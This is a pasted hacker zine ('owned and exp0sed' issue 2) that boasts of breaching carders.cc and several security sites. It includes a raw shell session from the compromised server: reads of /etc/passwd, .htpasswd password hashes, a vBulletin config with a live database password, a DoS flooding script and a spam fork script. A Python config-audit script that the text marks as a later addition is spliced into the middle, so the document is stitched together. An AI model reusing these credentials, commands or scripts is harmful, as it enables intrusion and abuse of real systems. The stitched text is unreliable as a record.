NoPaste.me

Time 25.12.2010 - 13:20
  1. For moar Info and the Databases check: http://tasteless.us/allgemein/admin/carders-cc-free-hack-gehackt-happy-ninjas-strike-back.html
  2.  
  3.                                                       |\___/|        
  4.               -=[ISSUE - NO 2]=-                     =) ^Y^ (=        
  5.                    -=[OF]=-                           \  ^  /        
  6.                                                        )=*=(          
  7.  ______________________________ __ ____________ _     /     \        
  8. |.-----.--.--.--.-----.-----.--|  |   ___ ___ _| ||   |     |        
  9. ||  _  |  |  |  |     |  -__|  _  |  | . |   | . ||  /| | | |\        
  10. ||_____|________|__|__|_____|_____|  |__,|_|_|___||  \| | |_|/\      
  11. |  | |                                   ______   |__//_// ___/ __    
  12. |  | |               .-----.--.--.-----.|      |.-----.--\_).--|  ||  
  13. |  | |               |  -__|_   _|  _  ||  ||  ||__ --|  -__|  _  ||  
  14. |  | |               |_____|__.__|   __||  ||  ||_____|_____|_____||  
  15. |_/   \__________________________|__|___|  ||  |___________________|  
  16.                                         |______|                      
  17. ------------------------.++-                                          
  18.                        / y-                                          
  19.                       /  y-                                          
  20. ---------------------/    s/----------------------.++-                
  21.                     /       ys+-.        |\      / y-                
  22. ---------------\.../    /\      ys------/()/    /  y-                
  23.                 sy      \/    /'''\      \|    /    s/-              
  24. ------------------+-++s     /-----'           /        s+-.          
  25. ---------------------/s    /-------------\.../    /\      ys          
  26.                       -y  s               sy      \/    /'''\        
  27. -----------------------y s---------------------++s     /-----'        
  28. ----------------------++'             |\        /s    /              
  29. -------------------------------------/()/        -y ys                
  30.                                       \|         -y s                
  31. -------------------------------------------------++'                  
  32.                                                 |_______________      
  33. ,_._._._._._._._,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _|   carders.cc  `\    
  34. |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|      inj3ct0r   \  
  35.                                   ~ Featuring ~ |       ettercap   \  
  36.       _______________|                          |___________________\
  37.     /´   exploit-db  |                          !                    
  38.    /   backtrack     |_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _,_._._._._._._._,
  39.   /  free-hack       |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
  40.  /___________________| ~ and ~                                        
  41.                      !                                                
  42.                                                                      
  43.                       Out of the Blue                                
  44.                             into the Black                            
  45. ,_._._._._._._._|____________________________________________________
  46. |_|_|_|_|_|_|_|_|___________________________________________________/
  47.     ~ INTRO ~   !                                                    
  48.                                                                      
  49. Greetings followers, welcome to the second issue of owned and exp0sed.
  50. This file is  encoded with UTF-8, so to view it  properly use unicode.
  51.                                                                      
  52. For those who are reading and laughing with us:                      
  53. We (your happy ninjas) wish you a                                    
  54.                                                                      
  55.                                  ,                                    
  56.                                _/^\_                                  
  57.                               < hax >                                
  58.                                /.-.\                                  
  59.             * MERRY *          `/&\`                                  
  60.                               ,@.*;@,                                
  61.                              /_o.I %_\                                
  62.                             (`'--:o(_@;                              
  63.                            /`;--.,__ `')                              
  64.                           ;@`o % O,*`'`&\                            
  65.                          (`'--)_@ ;o %'()\                            
  66.         * NINJA *        /`;--._`''--._O'@;                          
  67.                         /&*,()~o`;-.,_ `""`)                          
  68.                         /`,@ ;+& () o*`;-';\                          
  69.                         (`""--.,_0 +% @' &()\                        
  70.                        /-.,_    ``''--....-'`)                        
  71.                        /@%;o`:;'--,.__   __.'\                        
  72.                       ;*,&(); @ % &^;~`"`o;@();                      
  73.    * HAXMAS *         /(); o^~; & ().o@*&`;&%O\                      
  74.                       `"="==""==,,,.,="=="==="`                      
  75.                    __.----.(\-''#####---...___...-----._              
  76.                  '`         \)_`"""""`                                
  77.                          .--' `)                                      
  78.                        o(  )_-\                                      
  79.                          `"""` `                                      
  80.                                                                      
  81. After our first release we got wind of some strange rumours.  So  just
  82. to be sure, we need to clarify some facts.                            
  83.                                                                      
  84. So, who are we? First, let's talk about some things we are not. We are
  85. not an underground rival kiddy group. We are not a cyber  mafia  gang.
  86. We are the watchmen, the hackers who quietly observe the scene. If any
  87. skiddy community gets too big, we shut them down. If any lamer  causes
  88. too much trouble, we shut them down. If any group keeps fucking  stuff
  89. up, we stop them.                                                    
  90.                                                                      
  91. So, why are we doing this? Some people say that being a  vigilante  is
  92. wrong and that we are actually criminals. What can we say? This may be
  93. true. But the way we see it, if you're not part of the solution, you're
  94. part of the fucking problem. These idiots spread  garbage  across  our
  95. scene and that is why they got owned. We take pride in what is left of
  96. the scene and we have serious problems with those who rape it.        
  97.                                                                      
  98. That's why we do what MUST be done.                                  
  99.                                                                      
  100. There are some things left we would  like  to  say  about  carders.cc.
  101. First of all, they came back online after they got rm'ed. In the first
  102. issue we gave our word that we would make sure carders.cc would  never
  103. come back. Well, we delivered on that promise in this  issue.  And  as
  104. such carders.cc has once again been eliminated. Maybe this  time  they
  105. will get the hint.                                                    
  106.                                                                      
  107. Also, Heise Security said  that  we  were  a  rival  group  trying  to
  108. capitalize on the demise of carders.cc. Apparently they weren't  happy
  109. about our disclosure of the  carders.cc  database  that  included  the
  110. personal information of carders.cc victims. What Heise forgot was that
  111. with this action, all the victims of  carders.cc  got  the  chance  to
  112. realize that they were victims of fraud. You can try to say  that  our
  113. disclosure of the database put them at even greater risk of fraud  but
  114. we disagree. What is more risky? Having your information  secretly  on
  115. an "underground" carding forum where it  WILL  be  sold  and  used  in
  116. fraudulent activity?  Or, having  it  released  so  that  you  can  be
  117. notified and take the appropriate action to mitigate the  damage  that
  118. has been done? I know which option I'd rather have.                  
  119.                                                                      
  120. It is quite impressive how many people wrote about  the  Carders  Hack
  121. without even bothering to read the zine. It is hilarious  to  see  how
  122. the media works. Somebody writes an article, others  copy  information
  123. from it, others copy from it again. If we take a shit in a bowl.  Then
  124. you eat that shit and puke it back into a different bowl  for  someone
  125. else to eat then they do the  same  thing,  what  do  you  have?  "Two
  126. Journo's One Cup" is what you have. Fucking pathetic.                
  127.                                                                      
  128. On the other hand, we'd like to thank Brian Krebs. Even if some of his
  129. conclusions were way off the mark, he  was  still  the  first  one  to
  130. report about carders.cc and nearly every other article  was  based  on
  131. Brian's work. At least you didn't eat shit and regurgitate it like the
  132. rest Brian, keep up the good work.                                    
  133.                                                                      
  134. Enough jibber jabber, let's get to business.  You  will  soon  realize
  135. that our targets vary:                                                
  136.                                                                      
  137. We owned ettercap because we were tired of people firing that shit  up
  138. and pretending to be a l33th4x0r sheep who think they are the greatest
  139. hackerz with their ARP  spoofing  toolkitz..  If  you  have  installed
  140. ettercap in the last 5 years you may want to check yo shit (;p).      
  141.                                                                      
  142. We owned offsec including backtrack and exploit-db  because  they  are
  143. fucking security "expert" maggots (oops s/m/f/) who just fail so  hard
  144. at security that we wonder  why  people  really  take  their  training
  145. courses. We imagine it's like open mic night at the laughatorium.    
  146.                                                                      
  147. We owned inj3ct0r because they are lameass wannabe milw0rm kids  whose
  148. sole purpose in life is  to  disclose  XSS  0dayz  in  Joomla  (RSnake
  149. anyone?).                                                            
  150.                                                                      
  151. We owned carders.cc (AGAIN) because they  are  unable  to  learn  from
  152. their mistakes and keep spreading garbage around the underground.    
  153.                                                                      
  154. We owned free-hack  because  they  are  developing  into  one  of  the
  155. largest,  most  arrogant  script-kiddie  breeding   grounds   on   the
  156. intertubez.                                                          
  157.                                                                      
  158. ,_._._._._._._._|____________________________________________________
  159. |_|_|_|_|_|_|_|_|___________________________________________________/
  160.  ~ carders.cc ~ !                                                    
  161.                                                                      
  162. Here we go again. We hope that everybody was looking forward to seeing
  163. carders.cc getting owned again. We kept our word, didn't  we?  Let  us
  164. begin:                                                                
  165.  ____________________________________________________________________
  166. |                         __          __                             |
  167. |     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
  168. |     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
  169. |     |__   |_____|_____||____|_____||_____|_____|__.__|             |
  170. |________|__|________________________________________________________|
  171. |                                                                    |
  172. | The  ninja  guys  piss  on  you  and  your half trained monkeys or |
  173. | whatever your leet underground team consists of.  If you continue, |
  174. | you will be  owned over again and rm'd twice.   Also we will punch |
  175. | you in the face.                                                   |
  176. |____________________________________________________________________|
  177.                                                                      
  178. Our lazy ninja squad was too drunk to come over and punch you  in  the
  179. fucking face. So we'll just stick to owning you  for  now.  Carders.cc
  180. went down for a few days, but came back as if  nothing  had  happened.
  181. They switched some server admins and installed some  new  software  in
  182. the hopes that they would be safe. They turned on some l33t "security"
  183. settings like PHP's "Safe Mode" and  "Openbase  Dir",  and  they  also
  184. disabled lots of functions. All in all they thought they  were  pretty
  185. locked down. Well, obviously they were fucking  wrong.  It's  hard  to
  186. harden a system when everything is backdoored and unfortunately we are
  187. just too ninja to get stopped by your silly protections. You can never
  188. stop us. We will always  keep owning and exp0sing you.                
  189.                                                                      
  190. No. Matter. What. You. Try.                                          
  191.  
  192. $ uname -a
  193. FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
  194.  
  195. $ id
  196. uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc)
  197.  
  198. $ w
  199.  1:24AM  up 11 days,  4:23, 0 users, load averages: 0.37, 0.48, 0.54
  200. USER             TTY      FROM              LOGIN@  IDLE WHAT
  201.  
  202. $ alias ls="ls -la"
  203.  
  204. $ ls
  205.  
  206. total 47
  207. drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 .
  208. drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 ..
  209. -rw-r--r--   1 root  wheel   798 Jan 18  2010 .cshrc
  210. -rw-r--r--   1 root  wheel   265 Jan 18  2010 .profile
  211. -r--r--r--   1 root  wheel  6206 Jan 18  2010 COPYRIGHT
  212. -rw-r--r--   1 root  wheel     0 Jul  3 19:12 a
  213. drwxr-xr-x   2 root  wheel  1024 Jan 18  2010 bin
  214. drwxr-xr-x   7 root  wheel   512 Jan 18  2010 boot
  215. dr-xr-xr-x   5 root  wheel   512 Nov 24 21:14 dev
  216. drwxr-xr-x  22 root  wheel  2560 Nov  1 23:54 etc
  217. drwxr-x--x   4 root  wheel   512 Nov  1 23:54 home
  218. drwxr-xr-x   3 root  wheel  1536 Jan 18  2010 lib
  219. drwxr-xr-x   2 root  wheel   512 Apr  4  2010 libexec
  220. drwxr-xr-x   2 root  wheel   512 Jan 18  2010 media
  221. drwxr-xr-x   2 root  wheel   512 Jan 18  2010 mnt
  222. dr-xr-xr-x   1 root  wheel     0 Dec  6 00:58 proc
  223. drwxr-xr-x  11 root  wheel  1024 Nov  8 20:33 root
  224. drwxr-xr-x   2 root  wheel  2560 Jan 18  2010 sbin
  225. lrwxr-xr-x   1 root  wheel    11 Jan 18  2010 sys -> usr/src/sys
  226. drwxrwxrwt  11 root  wheel   512 Dec  5 23:42 tmp
  227. drwxr-xr-x 15 root  wheel   512 Jan 18  2010 usr
  228. drwxr-xr-x  23 root  wheel   512 Nov 24 21:14 var
  229.  
  230. $ cat /etc/passwd
  231. # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
  232. #
  233. root:*:0:0:Charlie &:/root:/bin/csh
  234. toor:*:0:0:Bourne-again Superuser:/root:
  235. daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
  236. operator:*:2:5:System &:/:/usr/sbin/nologin
  237. bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
  238. tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
  239. kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
  240. games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
  241. news:*:8:8:News Subsystem:/:/usr/sbin/nologin
  242. man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
  243. sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
  244. smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
  245. mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
  246. bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
  247. proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
  248. _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
  249. _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
  250. uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
  251. pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
  252. www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
  253. nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
  254. mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
  255. postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
  256. carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin
  257. cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin
  258.  
  259. $ cd /root
  260.  
  261. $ ls
  262. total 412628
  263. drwxr-xr-x  11 root       wheel           1024 Nov  8 20:33 .
  264. drwxr-xr-x  17 root       wheel            512 Jul  3 19:12 ..
  265. -rw-------   1 root       wheel           1856 Dec  5 23:53 .bash_history
  266. -rw-r--r--   1 root       wheel            798 Jan 18  2010 .cshrc
  267. -rw-------   1 root       wheel           2909 Dec  7 22:31 .history
  268. -rw-r--r--   1 root       wheel            155 Jan 18  2010 .k5login
  269. -rw-------   1 root       wheel             61 Jul  5 21:44 .lesshst
  270. -rw-r--r--   1 root       wheel            303 Jan 18  2010 .login
  271. drwx------   3 root       wheel            512 Dec  6 02:34 .mc
  272. -rw-------   1 root       wheel            641 Nov  8 20:33 .mysql_history
  273. -rw-r--r--   1 root       wheel            265 Jan 18  2010 .profile
  274. drwx------   2 root       wheel            512 Nov  7 17:20 .ssh
  275. -rw-r--r--   1 root       wheel      417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql
  276. drwxr-xr-x   3 root       wheel            512 Jul  3 00:34 backup
  277. drwxr-xr-x   4 root       wheel            512 Nov  8 17:58 backups
  278. drwxr-xr-x   2 root       wheel            512 Jul 20  2009 crack
  279. -rw-r--r--   1 root       wheel           3223 Jul 20  2009 crack.zip
  280. -rw-r--r--   1 root       wheel             85 Aug  9 03:31 ddos.php
  281. -rw-r--r--   1 root       wheel            168 Feb  1  2010 example.php
  282. drwxr-xr-x   3 root       wheel            512 Jul  5 00:41 greensql
  283. -rw-r--r--   1 root       wheel             20 Aug  9 03:26 info.php
  284. -rw-------   1 root       wheel          16877 Jul 29 20:44 mbox
  285. drwxr-xr-x   3 root       wheel            512 Jul  3 18:59 php
  286. drwxr-xr-x  14 carderscc  carderscc       1536 Nov  2 16:15 proftpd-1.3.3c
  287. -rw-r--r--   1 root       wheel        4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz
  288. drwxr-xr-x   2 root       wheel            512 Nov  8 18:50 stylebackup
  289.  
  290. Mad PHP-Codez again!
  291.  
  292. $ cat ddos.php
  293. <?php
  294. while(1==1) {
  295. $fp = fsockopen("92.241.190.202", 80, $errno, $errstr, 30);
  296. }
  297. ?>
  298.  
  299. $ cat info.php
  300. <?php
  301. phpinfo();
  302. ?>
  303.  
  304. $ cat example.php
  305. <?php
  306. pcntl_fork();
  307. pcntl_fork();
  308. pcntl_fork();
  309. pcntl_fork();
  310.  
  311. for ($i=0; $i<10; $i++) {
  312. echo ".";
  313. mail("jeka@2x4.ru","spammtest","this is a very big message...");
  314. }
  315. ?>
  316.  
  317. $ cd /home/carderscc
  318.  
  319. $ ls
  320. total 18
  321. drwxr-x---   7 carderscc  www     512 Nov 18 20:45 .
  322. drwxr-x--x   4 root       wheel   512 Nov  1 23:54 ..
  323. dr-xr-x---  18 carderscc  www    2560 Nov 12 23:32 carders.cc
  324. drwxrwxr-x   2 carderscc  www     512 Dec  2 00:34 jabber.carders.cc
  325. drwxrwxr-x  11 carderscc  www    3072 Nov  8 17:27 pma
  326. drwxrwxrwx   2 carderscc  www    2048 Dec  6 00:40 temp
  327. drwxrwxr-x   5 carderscc  www     512 Nov  6 19:47 vbseo
  328.  
  329. $ cd carders.cc
  330.  
  331. $ ls
  434.  
  435. $ cat .htpasswd
  436. ddos:XScRLnTwdeJ6k
  437.  
  438. $ cat includes/config.php
  439. <?php
  440. /*======================================================================*\
  441. || #################################################################### ||
  442. || # vBulletin 4.0.3 Patch Level 1
  443. || # ---------------------------------------------------------------- # ||
  444. || # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
  445. || # This file may not be redistributed in whole or significant part. # ||
  446. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  447. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  448. || #################################################################### ||
  449. \*======================================================================*/
  450.  
  451. /*-------------------------------------------------------*\
  452. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  453. +---------------------------------------------------------+
  454. | If you get any errors while attempting to connect to    |
  455. | MySQL, you will need to email your webhost because we   |
  456. | cannot tell you the correct values for the variables    |
  457. | in this file.                                           |
  458. \*-------------------------------------------------------*/
  459.  
  460.         //      ****** DATABASE TYPE ******
  461.         //      This is the type of the database server on which your vBulletin database will be located.
  462.         //      Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
  463.         // for slave options just append _slave to your preferred database type.
  464. $config['Database']['dbtype'] = 'mysql';
  465.  
  466.         //      ****** DATABASE NAME ******
  467.         //      This is the name of the database where your vBulletin will be located.
  468.         //      This must be created by your webhost.
  469. $config['Database']['dbname'] = 'carderscc_01';
  470.  
  471.         //      ****** TABLE PREFIX ******
  472.         //      Prefix that your vBulletin tables have in the database.
  473. $config['Database']['tableprefix'] = '';
  474.  
  475.         //      ****** TECHNICAL EMAIL ADDRESS ******
  476.         //      If any database errors occur, they will be emailed to the address specified here.
  477.         //      Leave this blank to not send any emails when there is a database error.
  478. $config['Database']['technicalemail'] = 'dbmaster@example.com';
  479.  
  480.         //      ****** FORCE EMPTY SQL MODE ******
  481.         // New versions of MySQL (4.1+) have introduced some behaviors that are
  482.         // incompatible with vBulletin. Setting this value to "true" disables those
  483.         // behaviors. You only need to modify this value if vBulletin recommends it.
  484. $config['Database']['force_sql_mode'] = false;
  485.  
  486.  
  487.  
  488.         //      ****** MASTER DATABASE SERVER NAME AND PORT ******
  489.         //      This is the hostname or IP address and port of the database server.
  490.         //      If you are unsure of what to put here, leave the default values.
  496. $config['MasterServer']['servername'] = 'localhost';
  497. $config['MasterServer']['port'] = 3306;
  498.  
  499.         //      ****** MASTER DATABASE USERNAME & PASSWORD ******
  500.         //      This is the username and password you use to access MySQL.
  501.         //      These must be obtained through your webhost.
  502. $config['MasterServer']['username'] = 'carderscc_01';
  503. $config['MasterServer']['password'] = 'VGZU76f3zgugdew&5gd3ugz&gd3uzguzg$dh3jgduzgdUGZDufe76g3d';
  504.  
  505.         //      ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  506.         //      This option allows you to turn persistent connections to MySQL on or off.
  507.         //      The difference in performance is negligible for all but the largest boards.
  508.         //      If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  509. $config['MasterServer']['usepconnect'] = 0;
  510.  
  511.  
  512.  
  513.         //      ****** SLAVE DATABASE CONFIGURATION ******
  514.         //      If you have multiple database backends, this is the information for your slave
  515.         //      server. If you are not 100% sure you need to fill in this information,
  516.         //      do not change any of the values here.
  517. $config['SlaveServer']['servername'] = '';
  518. $config['SlaveServer']['port'] = 3306;
  519. $config['SlaveServer']['username'] = '';
  520. $config['SlaveServer']['password'] = '';
  521. $config['SlaveServer']['usepconnect'] = 0;
  522.  
  523.  
  524.  
  525.         //      ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  526.         //      This setting allows you to change the name of the folders that the admin and
  527.         //      moderator control panels reside in. You may wish to do this for security purposes.
  528.         //      Please note that if you change the name of the directory here, you will still need
  529.         //      to manually change the name of the directory on the server.
  530. $config['Misc']['admincpdir'] = 'admincp';
  531. $config['Misc']['modcpdir'] = 'modcp';
  532.  
  533.         //      Prefix that all vBulletin cookies will have
  534.         //      Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  535. $config['Misc']['cookieprefix'] = 'bb';
  536.  
  537.         //      ******** FULL PATH TO FORUMS DIRECTORY ******
  538.         //      On a few systems it may be necessary to input the full path to your forums directory
  539.         //      for vBulletin to function normally. You can ignore this setting unless vBulletin
  540.         //      tells you to fill this in. Do not include a trailing slash!
  541.         //      Example Unix:
  542.         //        $config['Misc']['forumpath'] = '/home/users/public_html/forums';
  543.         //      Example Win32:
  544.         //        $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  545. $config['Misc']['forumpath'] = '';
  546.  
  547.  
  548.  
  549.         //      ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  550.         //      The users specified here will be allowed to view the admin log in the control panel.
  551.         //      Users must be specified by *ID number* here. To obtain a user's ID number,
  552.         //      view their profile via the control panel. If this is a new installation, leave
  553.         //      the first user created will have a user ID of 1. Separate each userid with a comma.
  554. $config['SpecialUsers']['canviewadminlog'] = '4835,9816';
  555.  
  556.         //      ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  557.         //      The users specified here will be allowed to remove ("prune") entries from the admin
  558.         //      log. See the above entry for more information on the format.
  559. $config['SpecialUsers']['canpruneadminlog'] = '4835,9816';
  560.  
  561.         //      ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  562.         //      The users specified here will be allowed to run queries from the control panel.
  563.         //      See the above entries for more information on the format.
  564.         //      Please note that the ability to run queries is quite powerful. You may wish
  565.         //      to remove all user IDs from this list for security reasons.
  566. $config['SpecialUsers']['canrunqueries'] = '4835,9816';
  567.  
  568.         //      ****** UNDELETABLE / UNALTERABLE USERS ******
  569.         //      The users specified here will not be deletable or alterable from the control panel by any users.
  570.         //      To specify more than one user, separate userids with commas.
  571. $config['SpecialUsers']['undeletableusers'] = '';
  572.  
  573.         //      ****** SUPER ADMINISTRATORS ******
  574.         //      The users specified below will have permission to access the administrator permissions
  575.         //      page, which controls the permissions of other administrators
  576. $config['SpecialUsers']['superadministrators'] = '4835,9816';
  577.  
  578.         // ****** DATASTORE CACHE CONFIGURATION *****
  579.         // Here you can configure different methods for caching datastore items.
  580.         // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
  581.         // vB_Datastore_APC - to use APC
  582.         // vB_Datastore_XCache - to use XCache
  583.         // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  584. // $config['Datastore']['class'] = 'vB_Datastore_Filecache';
  585.  
  586.         // ******** DATASTORE PREFIX ******
  587.         // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  588.         // than one set of forums installed on your host, you *may* need to use a prefix
  589.         // so that they do not try to use the same variable within the cache.
  590.         // This works in a similar manner to the database table prefix.
  591. // $config['Datastore']['prefix'] = '';
  592.  
  593.         // It is also necessary to specify the hostname or IP address and the port the server is listening on
  594. /*
  595. $config['Datastore']['class'] = 'vB_Datastore_Memcached';
  596. $i = 0;
  597. // First Server
  598. $i++;
  599. $config['Misc']['memcacheserver'][$i]           = '127.0.0.1';
  600. $config['Misc']['memcacheport'][$i]                     = 11211;
  601. $config['Misc']['memcachepersistent'][$i]       = true;
  602. $config['Misc']['memcacheweight'][$i]           = 1;
  603. $config['Misc']['memcachetimeout'][$i]          = 1;
  604. $config['Misc']['memcacheretry_interval'][$i] = 15;
  605. */
  606.  
  607. // ****** The following options are only needed in special cases ******
  608.  
  609.         //      ****** MySQLI OPTIONS *****
  610.         // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  611.         // If you need to set the default connection charset because your database
  612.         // is using a charset other than latin1, you can set the charset here.
  613.         // If you don't set the charset to be the same as your database, you
  614.         // may receive collation errors.  Ignore this setting unless you
  615.         // are sure you need to use it.
  616. $config['Mysqli']['charset'] = 'latin1';
  617.  
  618.         //      Optionally, PHP can be instructed to set connection parameters by reading from the
  619.         //      file named in 'ini_file'. Please use a full path to the file.
  620.         //      Example:
  621.         //      $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  622. $config['Mysqli']['ini_file'] = '/etc/my.cnf';
  623.  
  624. // Image Processing Options
  625.         // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
  626. $config['Misc']['maxwidth'] = 2592;
  627. $config['Misc']['maxheight'] = 1944;
  628.  
  629. /*======================================================================*\
  630. || ####################################################################
  631. || #
  632. || # CVS: $RCSfile$ - $Revision: 32878 $
  633. || ####################################################################
  634. \*======================================================================*/
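
The comments in the config.php above recommend emptying `canrunqueries` and renaming the control panel directories. The audit below is an added example, not part of the original paste and not vBulletin code; it checks those settings on a constructed config. The function names, severity labels and hardened values are assumptions.

```python
import re

# Constructed sample mirroring the settings shown above (password is a placeholder).
SAMPLE_CONFIG = r"""
$config['Database']['dbtype'] = 'mysql';
$config['MasterServer']['port'] = 3306;
$config['MasterServer']['password'] = 'PLACEHOLDER';
$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
*/
$config['SpecialUsers']['canviewadminlog'] = '4835,9816';
$config['SpecialUsers']['canpruneadminlog'] = '4835,9816';
$config['SpecialUsers']['canrunqueries'] = '4835,9816';
$config['SpecialUsers']['undeletableusers'] = '';
$config['SpecialUsers']['superadministrators'] = '4835,9816';
"""

# Constructed hardened variant of the same settings.
HARDENED_CONFIG = r"""
$config['Database']['dbtype'] = 'mysqli';
$config['Misc']['admincpdir'] = 'cp-renamed-a';
$config['Misc']['modcpdir'] = 'cp-renamed-m';
$config['SpecialUsers']['canviewadminlog'] = '4835';
$config['SpecialUsers']['canpruneadminlog'] = '';
$config['SpecialUsers']['canrunqueries'] = '';
$config['SpecialUsers']['undeletableusers'] = '4835';
$config['SpecialUsers']['superadministrators'] = '4835';
"""

ASSIGN = re.compile(r"^\s*\$config\['(\w+)'\]\['(\w+)'\]\s*=\s*(.*?);\s*$")


def _literal(raw):
    """Convert a PHP scalar literal (string, bool, int) to a Python value."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in "'\"":
        return raw[1:-1]
    if raw.lower() in ("true", "false"):
        return raw.lower() == "true"
    if re.fullmatch(r"-?\d+", raw):
        return int(raw)
    return raw


def parse_config(text):
    """Return {(section, key): value} for active, uncommented assignments.

    Line-oriented, not a PHP parser: it assumes one assignment per line.
    """
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)  # drop /* ... */ blocks
    settings = {}
    for line in text.splitlines():
        if line.lstrip().startswith(("//", "#")):
            continue
        match = ASSIGN.match(line)
        if match:
            section, key, raw = match.groups()
            settings[(section, key)] = _literal(raw)
    return settings


def _ids(settings, key):
    """Split a comma-separated SpecialUsers value into a set of user IDs."""
    value = str(settings.get(("SpecialUsers", key), ""))
    return {part.strip() for part in value.split(",") if part.strip()}


def audit(settings):
    """Return a list of (severity, key, message) findings."""
    findings = []
    query = _ids(settings, "canrunqueries")
    prune = _ids(settings, "canpruneadminlog")
    unprotected = _ids(settings, "superadministrators") - _ids(settings, "undeletableusers")
    if query:
        findings.append(("HIGH", "canrunqueries",
                         f"user IDs {', '.join(sorted(query))} can run SQL from the control panel"))
    if query & prune:
        findings.append(("MEDIUM", "canpruneadminlog",
                         f"user IDs {', '.join(sorted(query & prune))} can run queries and prune the admin log"))
    if unprotected:
        findings.append(("MEDIUM", "undeletableusers",
                         f"super administrators {', '.join(sorted(unprotected))} can be altered from the control panel"))
    for key, default in (("admincpdir", "admincp"), ("modcpdir", "modcp")):
        if settings.get(("Misc", key)) == default:
            findings.append(("LOW", key, f"control panel directory still has the default name '{default}'"))
    if settings.get(("Database", "dbtype")) in ("mysql", "mysql_slave"):
        findings.append(("INFO", "dbtype", "config comment recommends mysqli on PHP 5 and MySQL 4.1+"))
    return findings


if __name__ == "__main__":
    for severity, key, message in audit(parse_config(SAMPLE_CONFIG)):
        print(f"{severity:6} {key}: {message}")
```
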
  635.  
  636. $ cd ..
  637.  
  638. $ cd jabber.carders.cc
  639.  
  640. $ ls
  641. total 812
  642. drwxrwxr-x  2 carderscc  www     512 Dec  2 00:34 .
  643. drwxr-x---  7 carderscc  www     512 Nov 18 20:45 ..
  644. -rwxrwxr-x  1 carderscc  www    7948 Apr 28  2008 AC_OETags.js
  645. -rwxrwxr-x  1 carderscc  www  629979 Apr 28  2008 SparkWeb.swf
  646. -rw-r--r--  1 carderscc  www  128693 Dec  2 00:34 c100.txt
  647. -rwxrwxr-x  1 carderscc  www    3638 Apr 28  2008 favicon.ico
  648. -rwxrwxr-x  1 carderscc  www    1272 Apr 28  2008 history.htm
  649. -rwxrwxr-x  1 carderscc  www    1292 Apr 28  2008 history.js
  650. -rwxrwxr-x  1 carderscc  www    2656 Apr 28  2008 history.swf
  651. -rwxrwxr-x  1 carderscc  www   14590 Jun 30 16:00 index.html
  652. -rwxrwxr-x  1 carderscc  www    2518 Apr 28  2008 osxmousewheel.js
  653. -rwxrwxr-x  1 carderscc  www     657 Apr 28  2008 playerProductInstall.swf
  654.  
  655. $ cd pma
  656.  
  657. $ cat .htpasswd
  658. admin:0VisONWLe5DJE
  659.  
  660. $ cd /
  661.  
  662. $ls
  663. total 47
  664. drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 .
